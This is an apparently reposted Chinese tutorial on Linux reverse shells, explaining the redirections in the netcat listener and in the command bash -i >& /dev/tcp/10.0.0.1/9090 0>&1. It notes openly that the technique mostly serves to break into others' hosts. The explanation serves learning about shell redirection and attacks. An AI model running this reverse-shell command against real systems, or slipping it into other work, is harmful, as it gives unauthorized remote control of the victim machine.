Linux的反彈shell命令的解析

這篇文章主要介紹“Linux的反彈shell命令的解析”,在日常操作中,相信很多人在Linux的反彈shell命令的解析問題上存在疑惑,小編查閱了各式資料,整理出簡單好用的操作方法,希望對(duì)大家解答”Linux的反彈shell命令的解析”的疑惑有所幫助!接下來,請(qǐng)跟著小編一起來學(xué)習(xí)吧!

專注于為中小企業(yè)提供網(wǎng)站建設(shè)、做網(wǎng)站服務(wù),電腦端+手機(jī)端+微信端的三站合一,更高效的管理,為中小企業(yè)壺關(guān)免費(fèi)做網(wǎng)站提供優(yōu)質(zhì)的服務(wù)。我們立足成都,凝聚了一批互聯(lián)網(wǎng)行業(yè)人才,有力地推動(dòng)了千余家企業(yè)的穩(wěn)健成長,幫助中小企業(yè)通過網(wǎng)站建設(shè)實(shí)現(xiàn)規(guī)模擴(kuò)充和轉(zhuǎn)變。

1. 什么是反彈shell

簡單來說就是A主機(jī)可以通過執(zhí)行B主機(jī)上的命令并且把返回值都返回到A上。

2. 反彈shell的用途

這個(gè)反彈shell大部分用途是用來侵入別人的主機(jī)。就是因?yàn)楦杏X很厲害的樣子,所以才來研究這家伙

3. 反彈shell操作步驟

3.1. 在本機(jī)開啟端口9090

nc -lk 9090

3.2. 在需要被控制的機(jī)器上執(zhí)行如下兩種命令中的一種即可

bash -i >& /dev/tcp/10.0.0.1/9090 0>&1

3.3. 在本機(jī)剛才執(zhí)行nc -lk 9090命令行下面輸入需要被控制的主機(jī)的命令即可

Linux的反彈shell命令的解析

4. 原理

  1. A主機(jī)開啟9090端口的tcp服務(wù)

  2. B主機(jī)連接到A主機(jī)的9090的tcp服務(wù)

  3. A主機(jī)通過tcp服務(wù)把命令發(fā)到B主機(jī)

  4. B主機(jī)讀取命令并且在bash中執(zhí)行

  5. B主機(jī)把執(zhí)行結(jié)果發(fā)給A主機(jī)

這樣就可以在A主機(jī)中'玩弄'B主機(jī)了

下面重點(diǎn)來了

我們看這個(gè)操作其實(shí)還是蠻簡單的,但是我們不能只局限于表面。我們需要去了解它的原理

其實(shí)nc -lk 9090命令沒什么可說的,百度google一搜就出來了。我們今天要去解釋的是bash -i >&  /dev/tcp/10.0.0.1/9090 0>&1。這條命令在google也沒搜出來什么結(jié)果。所以只能自己加夜班搞了。

inux shell下常用的文件描述符是:

  1. 標(biāo)準(zhǔn)輸入 (stdin) :代碼為 0 ,使用 < 或 << ;

  2. 標(biāo)準(zhǔn)輸出 (stdout):代碼為 1 ,使用 > 或 >> ;

  3. 標(biāo)準(zhǔn)錯(cuò)誤輸出(stderr):代碼為 2 ,使用 2> 或 2>>。

首先我們把這個(gè)命令拆解一下

bash -i # 這個(gè)也不知道說啥  >& # 這條命令 其實(shí)就是把stderr也輸入到 stdout。它相當(dāng)于 `> xxx 2>&1`  /dev/tcp/10.0.0.1/9090 # 這個(gè)就是連接到10.0.0.1的9090端口  0>&1 # 這個(gè)在google百度上查了半天也沒搞懂,只能去研究文檔

其實(shí)前面3個(gè)命令組合在一起很好理解,就是把這個(gè)bash下的所有輸出都發(fā)送到 10.0.0.1:9090。這個(gè)大家可以自己操作一下,去掉后面的  0>&1。

我們?cè)诿罾锩鎸? 2>&1都很好理解,就是把error重定向到stdout。但是0>&1好像不太好理解,我們看下文件描述符

Linux的反彈shell命令的解析

這里看到的是2>&1就是把文件描述符2對(duì)應(yīng)的設(shè)備改成了文件描述符1對(duì)應(yīng)的設(shè)備。那么同理 0>&1就是把  0對(duì)應(yīng)的設(shè)備改成的1對(duì)應(yīng)的設(shè)備,那也就是socket。這就表明了  stdin就是從socket中讀取數(shù)據(jù),然后再執(zhí)行命令,把bash的命令行返回內(nèi)容通過stdout發(fā)到socket。

其實(shí)這些內(nèi)容都可以在bash的man pages里面找到

Linux的反彈shell命令的解析

文檔里面寫的很清楚 n<&word 是吧word復(fù)制給n, n>&word是吧word復(fù)制給n。

所以這里寫 0<&1 或者是 0>&1都是可以的,只要把文件描述符1對(duì)應(yīng)的設(shè)備復(fù)制給文件描述符0就可以了

到此,關(guān)于“Linux的反彈shell命令的解析”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識(shí),請(qǐng)繼續(xù)關(guān)注創(chuàng)新互聯(lián)網(wǎng)站,小編會(huì)繼續(xù)努力為大家?guī)砀鄬?shí)用的文章!

網(wǎng)站欄目:Linux的反彈shell命令的解析
標(biāo)題鏈接:http://muchs.cn/article24/ihghce.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供搜索引擎優(yōu)化、標(biāo)簽優(yōu)化、建站公司、網(wǎng)站設(shè)計(jì)公司手機(jī)網(wǎng)站建設(shè)、品牌網(wǎng)站制作

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

微信小程序開發(fā)